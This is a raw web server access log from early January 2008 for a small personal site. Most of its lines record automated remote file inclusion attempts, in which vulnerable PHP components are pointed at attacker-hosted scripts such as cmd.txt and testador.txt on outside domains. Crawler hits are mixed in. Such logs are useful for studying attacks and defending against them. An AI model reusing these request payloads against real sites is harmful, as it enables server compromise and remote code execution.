87.229.26.205 - - [02/Jan/2008:05:08:20 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=url%20shell? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:05:11:35 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:05:11:35 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.17.13 - - [02/Jan/2008:05:11:39 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.27.212.248 - - [02/Jan/2008:05:13:35 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.27.212.248 - - [02/Jan/2008:05:13:36 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.27.212.248 - - [02/Jan/2008:05:13:36 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:05:13:45 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:05:13:45 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:05:13:45 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:05:14:48 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.162 - - [02/Jan/2008:05:15:25 -0800] "GET /bikes/dteel/?D=A HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.147.74 - - [02/Jan/2008:05:15:33 -0800] "GET /logs/access_071129.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [02/Jan/2008:05:15:33 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [02/Jan/2008:05:15:33 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [02/Jan/2008:05:17:15 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [02/Jan/2008:05:17:15 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [02/Jan/2008:05:17:16 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [02/Jan/2008:05:19:02 -0800] "GET /logs/access_071219.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.125.92.68 - - [02/Jan/2008:05:20:33 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.125.92.68 - - [02/Jan/2008:05:20:34 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.125.92.68 - - [02/Jan/2008:05:20:34 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.125.92.68 - - [02/Jan/2008:05:33:50 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.125.92.68 - - [02/Jan/2008:05:33:51 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.125.92.68 - - [02/Jan/2008:05:33:51 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.67.192.15 - - [02/Jan/2008:05:38:47 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.45 - - [02/Jan/2008:05:39:59 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:05:45:13 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:05:47:14 -0800] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:05:50:30 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:05:50:30 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:05:54:11 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.129.193.100 - - [02/Jan/2008:05:58:48 -0800] "GET /logs//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.129.193.100 - - [02/Jan/2008:05:58:48 -0800] "GET //starnet/themes/c-sky/main.inc.php?cmsdir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.210.20.23 - - [02/Jan/2008:06:02:24 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.20.23 - - [02/Jan/2008:06:02:24 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.20.23 - - [02/Jan/2008:06:02:24 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.20.23 - - [02/Jan/2008:06:02:38 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:06:03:56 -0800] "GET //skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:06:03:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:06:04:05 -0800] "GET /retreat1/IMG_2768.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:06:05:17 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.188.234.38 - - [02/Jan/2008:06:07:07 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.188.234.38 - - [02/Jan/2008:06:07:12 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.188.234.38 - - [02/Jan/2008:06:07:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.25.34 - - [02/Jan/2008:06:12:18 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.25.34 - - [02/Jan/2008:06:12:18 -0800] "GET /Neos_Chronos/header.php?base_folder=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.25.34 - - [02/Jan/2008:06:12:18 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.25.34 - - [02/Jan/2008:06:13:00 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.41 - - [02/Jan/2008:06:17:47 -0800] "GET /logs/access_070831.log HTTP/1.0" 200 35113 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:06:28:03 -0800] "GET /?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:06:33:08 -0800] "GET /megumi/earrings/4_Venetian_AM_15.JPG HTTP/1.1" 200 3692828 "-" "Googlebot-Image/1.0" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:06:34:04 -0800] "GET /logs/access_071224.log/?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:06:34:04 -0800] "GET /logs/?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 200 28394 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.194.121 - - [02/Jan/2008:06:38:03 -0800] "GET /logs/access_071222.log/?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.148 - - [02/Jan/2008:06:40:08 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:06:40:14 -0800] "GET /tmp/?S=D HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.162 - - [02/Jan/2008:06:40:31 -0800] "GET /logs/ HTTP/1.0" 200 28963 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.13 - - [02/Jan/2008:06:40:50 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:42:29 -0800] "GET /phpgwapi/setup/tables_update.inc.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:42:29 -0800] "GET /logs/phpgwapi/setup/tables_update.inc.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:43:34 -0800] "GET /web_statistics//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:43:34 -0800] "GET /logs/web_statistics//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:06:47:01 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.230 - - [02/Jan/2008:06:48:10 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:48:54 -0800] "GET /logs/modules/My_eGallery/public?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:48:54 -0800] "GET /modules/My_eGallery/public?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.111.62.80 - - [02/Jan/2008:06:49:23 -0800] "GET /logs/index.php?fn=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.111.62.80 - - [02/Jan/2008:06:49:26 -0800] "GET /index.php?fn=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.234.215.83 - - [02/Jan/2008:06:49:45 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.234.215.83 - - [02/Jan/2008:06:49:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.20.143 - - [02/Jan/2008:06:51:34 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.119 - - [02/Jan/2008:06:52:18 -0800] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:06:52:52 -0800] "GET /retreat1/IMG_2765.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:06:53:14 -0800] "GET /retreat1/IMG_2716.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:06:53:34 -0800] "GET /retreat1/IMG_2724.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
209.51.157.178 - - [02/Jan/2008:06:53:34 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.157.178 - - [02/Jan/2008:06:53:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.157.178 - - [02/Jan/2008:06:53:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:06:53:54 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:06:54:35 -0800] "GET /retreat1/IMG_2740.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
129.100.3.118 - - [02/Jan/2008:06:54:37 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
129.100.3.118 - - [02/Jan/2008:06:54:37 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
129.100.3.118 - - [02/Jan/2008:06:54:40 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
129.100.3.118 - - [02/Jan/2008:06:54:40 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.157.178 - - [02/Jan/2008:06:55:45 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:56:56 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:06:57:03 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.6.24.81 - - [02/Jan/2008:06:57:25 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:06:59:05 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:05:05 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:05:05 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:05:05 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:06:00 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:06:00 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:06:00 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:07:26 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:07:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:07:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:07:45 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.68.5 - - [02/Jan/2008:07:08:20 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [02/Jan/2008:07:08:20 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
